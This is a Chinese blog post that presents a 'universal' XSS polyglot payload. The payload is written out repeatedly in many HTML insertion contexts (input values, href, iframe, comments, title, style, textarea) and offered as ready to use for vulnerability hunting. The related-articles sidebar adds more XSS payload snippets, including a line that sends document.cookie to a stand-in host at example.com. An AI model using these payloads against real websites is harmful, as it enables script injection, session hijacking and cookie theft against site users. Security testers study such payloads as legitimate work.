终极万能XSS Payload

已于 2023-11-07 16:58:18 修改
阅读量6.2k 收藏 34
点赞数 9
分类专栏: src挖掘 文章标签: php
于 2021-03-10 21:20:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39997096/article/details/114646308
版权

前言:

在进行跨站脚本攻击的时候(xss),通常会需要我们通过插入的代码场景构造payload。就比较耗费时间,为了更方便的去测试漏洞,万能XSS payload就出现了

什么是万能XSS payload:

这里对它的定义就是 可以适应各种场景进行js代码执行的 payload,只需要有这一条payload即可(例如闭合html 闭合js)

下面我们来看看 payload长什么样子:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

插入到HTML测试

双引号标签:

<input type="text" value="

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

"></input>

单引号标签:

<input type='text' value='

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

'></input>

无引号标签:

<input type=text value=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>

转义绕过(需要点击 触发事件)

<img border=3 alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e>
  • href  xlink:href和 src 的值会转译 由于是a标签 这里也是需要点击触发:
<a href="

jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e

">click me</a>

<math xlink:href="

jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e

">click me</math>
<iframe src="

jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e

"></iframe>

插入到HTML注释中

<!--

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

-->

插入到任意标签中

<title>

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

</title>
<style>

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

</style>
<textarea>

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

</textarea>
<div>

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

</div>

后面测试的太多了 懒得翻了 总结下  这里作者想表达的就是 不管在什么场景下的能够插入到前端任何代码场景并执行 html js 注释中 …… 用它就行了

原地址 :Unleashing an Ultimate XSS Polyglot · 0xSobky/HackVault Wiki · GitHub

更多实战文章 关注公众号:None安全团队

None安全团队
关注
专栏目录
各种 XSS Payload 速查清单
Sumarua的博客
07-18 1521
各种XSSPayload速查清单
3.2.1初探XSS Payload
wojiushilsy的博客
06-26 719
XSS 攻击成功后,攻击者能够对用户当前浏览的页面植入恶意脚本,通过恶意脚本,控制用户的浏览器。这些用以完成各种具体功能的恶意脚本,被称为"XSS Payload"。 XSS Payload实际上就是JavaScript脚本(还可以是Flash或其他富客户端的脚本),所以任何JavaScript脚本能实现的功能,XSS Payload都能做到。 一个最常见的XSS Payload,就是通过读取浏览器对象,从而发起“Cookie劫持”攻击。 Cookie中一般加密保存了当前用户的登录凭证。Cookie如果丢失
XSS payload大全
01-22
总结的XSSpayload,可以直接使用,直接进行攻击,各种payload
xss payload大全(实用)
热门推荐
Bul1et的博客
01-25 2万+
验证xss的时候总感觉姿势不够 这下好了   这么多  任你随便插 '&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; ='&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; &lt;script&gt;alert(document.cookie)&lt;/scrip...
反射型XSS的几种payload
最新发布
m0_70638961的博客
08-17 677
符合web的解码顺序,所以可以被执行。和数据只能有文本,不会有HTML解码和URL解码操作和里会有HTML解码操作,但不会有子元素其他元素数据(如div)和元素属性数据(如href)中会有HTML解码操作部分属性(如href)会有URL解码操作,但URL中的协议需为ASCIIJavaScript会对字符串和标识符Unicode解码根据浏览器的自动解码,反向构造 XSS Payload 即可。
XSS payload (大集合)
m0_51186260的博客
10-18 3129
<script>alert(/xss/)</script> <script>alert(&#38;XSS&#38;)</script> <script>alert(&quot;XSS&quot;)</script>(代替被转义的“”) <INPUT type="text"value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))&l
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
xss绕过,payload全集
spang_33的博客
07-05 2万+
XSS总结:        xss分为三种,反射型xss,DOM型XSS及存储型XSS,不同类型的XSS的危害不同,有兴趣的可以观看一下csdn上明智讲的关于XSS攻击及原理。https://edu.csdn.net/course/detail/8585里面的修复原理和补丁代码讲的还是很详细的,他的课程还有利用xss获取cookie等。&lt;img src=x onerror=alert(1)&...
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
xss payload
weixin_33701564的博客
06-29 356
><SCRIPT>alert("hello")</SCRIPT> 转载于:https://www.cnblogs.com/fanzi2009/archive/2009/08/13/1545474.html
xss-payload
weixin_45095113的博客
11-11 1022
xss攻击载荷
XSS测试payload
09-19
XSS测试payload,收集了简单的XSS测试用例,较具有实用性。
xsspayload.zip
06-10
xsspayload/xsspayload_fix(修改了值方便查看具体是哪句执行成功)/burpsuite/
xsspayload
Js_123456789的博客
12-06 235
元素on事件: prompt(document.cookie) document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie console.log(document.cookie) alert(document.cookie) <img src="xxx" o...
xsspayload标签
weixin_55802150的博客
08-03 150
这个需要借助 data 伪协议和 base64 编码来实现绕过。
漏洞进阶之——XSS万能超级无敌全通杀payload
LizePing_的博客
07-10 2979
XSS万能超级无敌全通杀payloadpayload——payload—— —————————————— 抱歉起的名字猖狂了点,我认,但我不改 —————————————— payload—— payload——
XSS-Payload大全
gy1bubble的博客
10-11 1489
<body oninput=javascript:alert(1)><input autofocus> <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKM.
XSS payload 大全
08-01 438
收集的一些XSS payload,主要分为五大类,便于查阅。 #第一类:Javascript URL <a href="javascript:alert('test')">link</a> <a href="java&#115;cript:alert('xss')">link</a> <a href='vbscri...
xsspayload大全
05-10
XSS(Cross-site Scripting)攻击是指在web应用程序中注入客户端脚本代码,利用Web服务器对用户的信任,触发特定的安全漏洞实现攻击的一种手段。攻击者可以通过在web页面注入恶意的JavaScript代码,绕过浏览器的安全限制,在用户不知情的情况下获取用户的敏感信息,甚至窃取用户的账号密码。 XSSPayload大全是一个攻击者可能会使用的常见XSS攻击代码集合,其中包含大量的javascript代码,实现了多种不同的攻击需求:窃取用户信息、篡改网页内容、引导用户到恶意站点、以及利用开发人员疏忽而导致信息泄露等。 XSS攻击的发生往往是由于应用程序没有对用户的输入进行足够的验证和过滤,攻击成功将给用户造成不良影响,并严重危害应用的安全性和稳定性。因此,对于开发人员而言,加强对XSS攻击的了解,学习防范措施,规范应用程序编码规范和安全策略,是必不可少的。 对于用户而言,则需要谨慎选择信用较高的网站,避免点击陌生网站,避免随意输入敏感信息,并保持定期的系统和浏览器更新。 总之,XSSPayload大全的出现提醒我们:互联网时代,网络安全问题日益突出,我们需要提高警惕,在日常生活中保持谨慎和警惕,同时加强对网络安全知识的学习,成为网络安全方面的懂行人。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值